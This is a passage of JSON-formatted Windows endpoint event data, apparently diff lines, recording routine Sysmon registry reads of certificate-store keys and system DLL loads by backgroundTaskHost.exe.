"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "slc.dll", - "image_path": "C:\\Windows\\System32\\slc.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571690740000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691210000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { 
- "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "ncrypt.dll", - "image_path": "C:\\Windows\\System32\\ncrypt.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - 
"unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "ntasn1.dll", - "image_path": "C:\\Windows\\System32\\ntasn1.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common", - "registry_path": 
"\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskExecutionCountSinceLastReset", - "registry_value": "TaskExecutionCountSinceLastReset", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cdp.dll", - "image_path": "C:\\Windows\\System32\\cdp.dll", - "pid": 6376, - "process_name": 
"backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691050000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": 
"C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", - "registry_value": "LocalState", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", - "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", - "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", - "registry_value": "ContentDeliveryManager.Background.WatchdogTask", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 